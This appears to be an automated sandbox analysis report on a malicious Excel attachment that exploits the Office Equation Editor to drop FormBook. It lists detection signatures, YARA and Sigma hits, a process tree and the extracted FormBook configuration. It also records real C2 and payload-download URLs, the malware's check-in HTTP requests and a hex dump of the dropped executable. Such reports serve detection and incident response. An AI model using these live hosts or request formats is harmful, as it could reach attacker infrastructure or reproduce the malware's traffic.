Loading ...

Play interactive tourEdit tour

Windows Analysis Report REMITTANCE ADVICE.xlsx

Overview

General Information

Sample Name:REMITTANCE ADVICE.xlsx
Analysis ID:528736
MD5:2caab2292b282e6a5dea1cf78f84924a
SHA1:86f37c31091b15cca135490a84eb52027bb1a4df
SHA256:4c84124c87cd46ce58a7a8208ad1674c4a270793f9a6158e80fd28f96b3cc844
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 284 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1184 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1348 cmdline: "C:\Users\Public\vbc.exe" MD5: 1624595E2354FF7BE9E7DC6DEF2ED69E)
      • vbc.exe (PID: 2028 cmdline: "C:\Users\Public\vbc.exe" MD5: 1624595E2354FF7BE9E7DC6DEF2ED69E)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • explorer.exe (PID: 2992 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
            • cmd.exe (PID: 1228 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ff4cu6twc.xyz/m07f/"], "decoy": ["khitthit.club", "kczu.net", "caylalamar.com", "iixiazai.com", "nickatwoodrealestate.com", "006664.com", "strimsbdltd.com", "mykyhouse.com", "flyestkicks.com", "campingwithoutcanvas.com", "sarishamisen.com", "retrorecycling.com", "zw4azsjb3cuj.biz", "lokasennaservices.com", "charleswagner.xyz", "smmbazar.net", "rebornmkt.com", "clicktoreach.com", "alendigital.xyz", "carehrc.com", "locationdevice.online", "homevoru.com", "electrahealth.clinic", "punto-linea-espacio.com", "yhxt13800.com", "pancakeshares.com", "artdecooutdoor.com", "phg-formation.com", "businessagilitysessions.com", "procofun.com", "thekatz.group", "casepoo.com", "tokofebri.store", "crippledom.com", "online-shrine-ltd.com", "jesbon.com", "ligoom.com", "odonofally.quest", "tender.guru", "payments-gate-325r.xyz", "bfcmtld.com", "scoocs.info", "welderstexas.com", "eastendfinances.com", "bohoglamburlesque.com", "naijafame.net", "digitallghtning.com", "refreshpor.xyz", "luly-boo.com", "enchantedroses-shop.com", "victorrialand.com", "kenzivenum.com", "protokolavukatlik.com", "berrymojito.com", "empireexteriorservices.com", "pushaoeel-kouhu-bunan7266.com", "travellerbugs.com", "allcources.com", "jaszicurls.com", "rem-youth.com", "strawberryroom-15.com", "paramusinsurancebroker.com", "jhtz001.com", "promtgloan.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.510000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.510000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.510000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.173.90, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1184, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1348
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1184, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1348

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ff4cu6twc.xyz/m07f/"], "decoy": ["khitthit.club", "kczu.net", "caylalamar.com", "iixiazai.com", "nickatwoodrealestate.com", "006664.com", "strimsbdltd.com", "mykyhouse.com", "flyestkicks.com", "campingwithoutcanvas.com", "sarishamisen.com", "retrorecycling.com", "zw4azsjb3cuj.biz", "lokasennaservices.com", "charleswagner.xyz", "smmbazar.net", "rebornmkt.com", "clicktoreach.com", "alendigital.xyz", "carehrc.com", "locationdevice.online", "homevoru.com", "electrahealth.clinic", "punto-linea-espacio.com", "yhxt13800.com", "pancakeshares.com", "artdecooutdoor.com", "phg-formation.com", "businessagilitysessions.com", "procofun.com", "thekatz.group", "casepoo.com", "tokofebri.store", "crippledom.com", "online-shrine-ltd.com", "jesbon.com", "ligoom.com", "odonofally.quest", "tender.guru", "payments-gate-325r.xyz", "bfcmtld.com", "scoocs.info", "welderstexas.com", "eastendfinances.com", "bohoglamburlesque.com", "naijafame.net", "digitallghtning.com", "refreshpor.xyz", "luly-boo.com", "enchantedroses-shop.com", "victorrialand.com", "kenzivenum.com", "protokolavukatlik.com", "berrymojito.com", "empireexteriorservices.com", "pushaoeel-kouhu-bunan7266.com", "travellerbugs.com", "allcources.com", "jaszicurls.com", "rem-youth.com", "strawberryroom-15.com", "paramusinsurancebroker.com", "jhtz001.com", "promtgloan.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: REMITTANCE ADVICE.xlsxVirustotal: Detection: 35%Perma Link
          Source: REMITTANCE ADVICE.xlsxReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://192.210.173.90/70007/vbc.exeAvira URL Cloud: Label: malware
          Source: www.ff4cu6twc.xyz/m07f/Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 27%
          Source: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dllReversingLabs: Detection: 40%
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dllJoe Sandbox ML: detected
          Source: 7.2.explorer.exe.2ca796c.7.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.510000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.explorer.exe.41b680.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.526224259.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.464564394.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.465728410.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.525516222.0000000000720000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 00000007.00000002.670738213.0000000002920000.00000040.00000001.sdmp
          Source: Binary string: explorer.pdb source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
          Source: global trafficDNS query: name: www.promtgloan.com
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.90:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.90:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 156.234.44.48:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 156.234.44.48:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 156.234.44.48:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.yhxt13800.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.205.233.189 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.234.44.48 80
          Source: C:\Windows\explorer.exeDomain query: www.ff4cu6twc.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.139.107 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.promtgloan.com
          Source: C:\Windows\explorer.exeDomain query: www.clicktoreach.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.ff4cu6twc.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.ff4cu6twc.xyz/m07f/
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: IKGUL-26484US IKGUL-26484US
          Source: global trafficHTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== HTTP/1.1Host: www.promtgloan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA HTTP/1.1Host: www.yhxt13800.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== HTTP/1.1Host: www.clicktoreach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.225.139.107 23.225.139.107
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 17:12:13 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12Last-Modified: Wed, 24 Nov 2021 09:28:50 GMTETag: "4a7bd-5d1857c59b117"Accept-Ranges: bytesContent-Length: 305085Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 70 03 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /70007/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.90Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:13:29 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 